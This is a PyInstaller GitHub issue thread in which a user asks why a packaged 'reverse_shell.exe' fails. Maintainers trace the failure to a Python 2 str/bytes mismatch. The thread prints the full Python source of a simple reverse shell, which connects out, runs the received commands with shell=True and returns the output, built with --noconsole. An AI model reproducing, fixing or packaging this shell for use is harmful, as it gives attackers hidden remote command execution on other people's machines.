### DISCUSSION TITLE
Pyinstaller genrated .exe file generates error "Failed to execute script"

### DISCUSSION THREAD

**Discussion by lamak2k1** [pyinstaller/pyinstaller#5782] [Help]
Hello Developers/Contributors/Authors,

I have tried to build a .exe file for a perfectly running python code in the IDE. 

The command used to build the .exe:  pyinstaller --noconsole --onefile reverse_shell.py

The build is successful with the following lines:

2738 INFO: PyInstaller: 4.3
4066 INFO: Python: 3.8.5 (conda)
4076 INFO: Platform: Windows-10-10.0.21343-SP0
4081 INFO: wrote C:\BD\reverse_shell.spec
4093 INFO: UPX is not available.
4115 INFO: Extending PYTHONPATH with paths
['C:\\BD', 'C:\\BD']
4205 INFO: checking Analysis
4206 INFO: Building Analysis because Analysis-00.toc is non existent
4206 INFO: Initializing module dependency graph...
4215 INFO: Caching module graph hooks...
4231 WARNING: Several hooks defined for module 'win32ctypes.core'. Please take care they do not conflict.
4239 INFO: Analyzing base_library.zip ...
14279 INFO: Processing pre-find module path hook distutils from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks\\pre_find_module_path\\hook-distutils.py'.
14280 INFO: distutils: retargeting to non-venv dir 'c:\\users\\lamak\\anaconda3\\lib'
19786 INFO: Caching module dependency graph...
20048 INFO: running Analysis Analysis-00.toc
20063 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable
  required by c:\users\lamak\anaconda3\python.exe
20398 INFO: Analyzing C:\BD\reverse_shell.py
20689 INFO: Processing module hooks...
(base) C:\BD>oading module hook 'hook-difflib.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
20694 INFO: Loading module hook 'hook-distutils.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
20695 INFO: Loading module hook 'hook-distutils.util.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
20698 INFO: Loading module hook 'hook-encodings.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
20870 INFO: Loading module hook 'hook-heapq.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
20872 INFO: Loading module hook 'hook-lib2to3.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
20929 INFO: Loading module hook 'hook-multiprocessing.util.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
20931 INFO: Loading module hook 'hook-pickle.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
20933 INFO: Loading module hook 'hook-sysconfig.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
20934 INFO: Loading module hook 'hook-xml.etree.cElementTree.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
20934 INFO: Loading module hook 'hook-xml.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
21134 INFO: Loading module hook 'hook-_tkinter.py' from 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks'...
21407 INFO: checking Tree
21407 INFO: Building Tree because Tree-00.toc is non existent
21410 INFO: Building Tree Tree-00.toc
21507 INFO: checking Tree
21508 INFO: Building Tree because Tree-01.toc is non existent
21510 INFO: Building Tree Tree-01.toc
21689 INFO: checking Tree
21690 INFO: Building Tree because Tree-02.toc is non existent
21692 INFO: Building Tree Tree-02.toc
21724 INFO: Looking for ctypes DLLs
21787 INFO: Analyzing run-time hooks ...
21791 INFO: Including run-time hook 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks\\rthooks\\pyi_rth_multiprocessing.py'
21796 INFO: Including run-time hook 'c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\hooks\\rthooks\\pyi_rth_win32api.py'
21818 INFO: Looking for dynamic libraries
22046 INFO: Looking for eggs
22046 INFO: Using Python library c:\users\lamak\anaconda3\python38.dll
22048 INFO: Found binding redirects:
[]
22090 INFO: Warnings written to C:\BD\build\reverse_shell\warn-reverse_shell.txt
22142 INFO: Graph cross-reference written to C:\BD\build\reverse_shell\xref-reverse_shell.html
22151 INFO: checking PYZ
22152 INFO: Building PYZ because PYZ-00.toc is non existent
22153 INFO: Building PYZ (ZlibArchive) C:\BD\build\reverse_shell\PYZ-00.pyz
22847 INFO: Building PYZ (ZlibArchive) C:\BD\build\reverse_shell\PYZ-00.pyz completed successfully.
22902 INFO: checking PKG
22903 INFO: Building PKG because PKG-00.toc is non existent
22905 INFO: Building PKG (CArchive) PKG-00.pkg
24703 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
24707 INFO: Bootloader c:\users\lamak\anaconda3\lib\site-packages\PyInstaller\bootloader\Windows-64bit\runw.exe
24707 INFO: checking EXE
24709 INFO: Building EXE because EXE-00.toc is non existent
24710 INFO: Building EXE from EXE-00.toc
24751 INFO: Copying icons from ['c:\\users\\lamak\\anaconda3\\lib\\site-packages\\PyInstaller\\bootloader\\images\\icon-windowed.ico']
24756 INFO: Writing RT_GROUP_ICON 0 resource with 104 bytes
24758 INFO: Writing RT_ICON 1 resource with 3752 bytes
24760 INFO: Writing RT_ICON 2 resource with 2216 bytes
24763 INFO: Writing RT_ICON 3 resource with 1384 bytes
24766 INFO: Writing RT_ICON 4 resource with 38188 bytes
24768 INFO: Writing RT_ICON 5 resource with 9640 bytes
24772 INFO: Writing RT_ICON 6 resource with 4264 bytes
24774 INFO: Writing RT_ICON 7 resource with 1128 bytes
24791 INFO: Updating manifest in C:\BD\build\reverse_shell\runw.exe.6nhckga1
24794 INFO: Updating resource type 24 name 1 language 0
24803 INFO: Appending archive to EXE C:\BD\dist\reverse_shell.exe
26583 INFO: Building EXE from EXE-00.toc completed successfully.

When I try to execute the executable, Following error message appears:
![image](https://user-images.githubusercontent.com/68698510/116361030-26e59f00-a81e-11eb-8f0c-a51151a0d615.png)

Can anyone help me solve this issue?

**Comment by bwoodsend** [comment]
Turn `--noconsole` off then run your program from a plain terminal. That should give you an error message you can use.

**Reply by lamak2k1** [reply]
I tried doing the command by removing the `--noconsole` from a plain terminal of cmd in Windows:

Command: `pyinstaller --onefile reverse_shell.py 
`
The output from the pyinstaller is:

78 INFO: PyInstaller: 4.3
78 INFO: Python: 3.9.4
78 INFO: Platform: Windows-10-10.0.21343-SP0
78 INFO: wrote C:\BD\reverse_shell.spec
78 INFO: UPX is not available.
78 INFO: Extending PYTHONPATH with paths
['C:\\BD', 'C:\\BD']
93 INFO: checking Analysis
93 INFO: Building because hookspath changed
93 INFO: Initializing module dependency graph...
93 INFO: Caching module graph hooks...
109 WARNING: Several hooks defined for module 'win32ctypes.core'. Please take care they do not conflict.
109 INFO: Analyzing base_library.zip ...
1813 INFO: Processing pre-find module path hook distutils from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks\\pre_find_module_path\\hook-distutils.py'.
1829 INFO: distutils: retargeting to non-venv dir 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib'
4097 INFO: Caching module dependency graph...
4237 INFO: running Analysis Analysis-00.toc
4237 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable
  required by c:\users\lamak\appdata\local\programs\python\python39\python.exe
4300 WARNING: lib not found: api-ms-win-core-path-l1-1-0.dll dependency of c:\users\lamak\appdata\local\programs\python\python39\python39.dll
4315 INFO: Analyzing C:\BD\reverse_shell.py
4331 INFO: Processing module hooks...
4331 INFO: Loading module hook 'hook-difflib.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4331 INFO: Loading module hook 'hook-distutils.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4331 INFO: Loading module hook 'hook-distutils.util.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4331 INFO: Loading module hook 'hook-encodings.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4409 INFO: Loading module hook 'hook-heapq.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4409 INFO: Loading module hook 'hook-lib2to3.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4487 INFO: Loading module hook 'hook-multiprocessing.util.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4487 INFO: Loading module hook 'hook-pickle.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4487 INFO: Loading module hook 'hook-sysconfig.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4487 INFO: Loading module hook 'hook-xml.etree.cElementTree.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4487 INFO: Loading module hook 'hook-xml.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4518 INFO: Loading module hook 'hook-_tkinter.py' from 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks'...
4769 INFO: checking Tree
4769 INFO: Building because root changed
4769 INFO: Building Tree Tree-00.toc
4898 INFO: checking Tree
4914 INFO: Building because root changed
4914 INFO: Building Tree Tree-01.toc
4992 INFO: checking Tree
4992 INFO: Building because root changed
5008 INFO: Building Tree Tree-02.toc
5023 INFO: Looking for ctypes DLLs
5039 INFO: Analyzing run-time hooks ...
5039 INFO: Including run-time hook 'c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\hooks\\rthooks\\pyi_rth_multiprocessing.py'
5055 INFO: Looking for dynamic libraries
5258 INFO: Looking for eggs
5258 INFO: Using Python library c:\users\lamak\appdata\local\programs\python\python39\python39.dll
5258 INFO: Found binding redirects:
[]
5273 INFO: Warnings written to C:\BD\build\reverse_shell\warn-reverse_shell.txt
5320 INFO: Graph cross-reference written to C:\BD\build\reverse_shell\xref-reverse_shell.html
5336 INFO: checking PYZ
5336 INFO: Building because toc changed
5336 INFO: Building PYZ (ZlibArchive) C:\BD\build\reverse_shell\PYZ-00.pyz
5711 INFO: Building PYZ (ZlibArchive) C:\BD\build\reverse_shell\PYZ-00.pyz completed successfully.
5727 INFO: checking PKG
5727 INFO: Building because toc changed
5727 INFO: Building PKG (CArchive) PKG-00.pkg
7009 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
7009 INFO: Bootloader c:\users\lamak\appdata\local\programs\python\python39\lib\site-packages\PyInstaller\bootloader\Windows-64bit\run.exe
7009 INFO: checking EXE
7009 INFO: Building because icon changed
7024 INFO: Building EXE from EXE-00.toc
7024 INFO: Copying icons from ['c:\\users\\lamak\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\PyInstaller\\bootloader\\images\\icon-console.ico']
7024 INFO: Writing RT_GROUP_ICON 0 resource with 104 bytes
7024 INFO: Writing RT_ICON 1 resource with 3752 bytes
7024 INFO: Writing RT_ICON 2 resource with 2216 bytes
7024 INFO: Writing RT_ICON 3 resource with 1384 bytes
7024 INFO: Writing RT_ICON 4 resource with 37019 bytes
7024 INFO: Writing RT_ICON 5 resource with 9640 bytes
7024 INFO: Writing RT_ICON 6 resource with 4264 bytes
7024 INFO: Writing RT_ICON 7 resource with 1128 bytes
7044 INFO: Updating manifest in C:\BD\build\reverse_shell\run.exe.j8sj9km_
7044 INFO: Updating resource type 24 name 1 language 0
7044 INFO: Appending archive to EXE C:\BD\dist\reverse_shell.exe
8011 INFO: Building EXE from EXE-00.toc completed successfully.

It does not show any specific errors during the build as above. But still, the script is not getting executed. Any other ways in which I can proceed so that I can get my script running properly?

**Reply by rokm** [reply]
> It does not show any specific errors during the build as above.

It's a run-time error, not a build-time one. That's why build log contains no useful information in this case.

> But still, the script is not getting executed.

What we need is error message(s) that you get in terminal when you run your compiled exe from terminal?

**Reply by lamak2k1** [reply]
I have now ran the .exe file from the plain terminal and this is the error output:

**C:\BD>reverse_shell.exe
Connection established with the server!
Traceback (most recent call last):
  File "reverse_shell.py", line 39, in <module>
  File "reverse_shell.py", line 25, in shell
  File "reverse_shell.py", line 18, in reliable_recieve
TypeError: can only concatenate str (not "bytes") to str
[3112] Failed to execute script reverse_shell**

The reverse_shell.py code is:

```
#!/usr/bin/python
import socket
import subprocess
import json
import sys
if sys.platform == "win32":
    import ctypes
    ctypes.windll.kernel32.SetDllDirectoryA(None)

def reliable_send(data):
        json_data = json.dumps(data)
        sock.send(json_data)

def reliable_recieve():
        json_data = ""
        while True:
                try:
                        json_data = json_data + sock.recv(1024)
                        return json.loads(json_data)
                except ValueError:
                        continue

def shell():
	while True:
		message = reliable_recieve()
		if message == "q":
			break
		else:	
			try:
				proc = subprocess.Popen(message, shell = True, stdout =subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE, close_fds=True) 
				answer = proc.stdout.read() + proc.stderr.read()
				reliable_send(answer)
			except:
				reliable_send("!!CANNOT RUN THAT COMMAND!!")

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(("127.0.0.1",54321))
print ("Connection established with the server!")
shell()
sock.close()
```
_Do check this out if this would help you figure out where the issue is and let me know how to rectify the issue._

**Reply by rokm** [reply]
```python
def reliable_recieve():
        json_data = ""
        while True:
                try:
                        json_data = json_data + sock.recv(1024)
                        return json.loads(json_data)
                except ValueError:
                        continue
```

>  TypeError: can only concatenate str (not "bytes") to str

You're trying to concatenate `str` and `bytes`; your `json_data` is initialized as `str` and `sock.recv()` is returning `bytes`. This has nothing to do with PyInstaller...

**Reply by lamak2k1** [reply]
When I compile the code with python, it runs just fine. So, why does this error show up only when I run the `.exe` file generated by `pyinstaller`? Any idea on it?

**Reply by rokm** [reply]
> When I compile the code with python, it runs just fine.

I doubt that code runs under python 3, because `socket.recv()` returns `bytes` and `socket.send()` expects `bytes`, but your code uses `str` instances. The only way I can imagine it working is if you're actually running it under python 2...

**Reply by lamak2k1** [reply]
Yes! I have used python 2.7 to write the code. Will `pyinstaller` not support python 2.7? If it does not, is there a way to make `pyinstaller` support python 2.7?

**Reply by rokm** [reply]
Recent PyInstaller releases don't support python 2.7 (or anything older than and including 3.5).

In this case I imagine it would be easier to port your script to python 3.
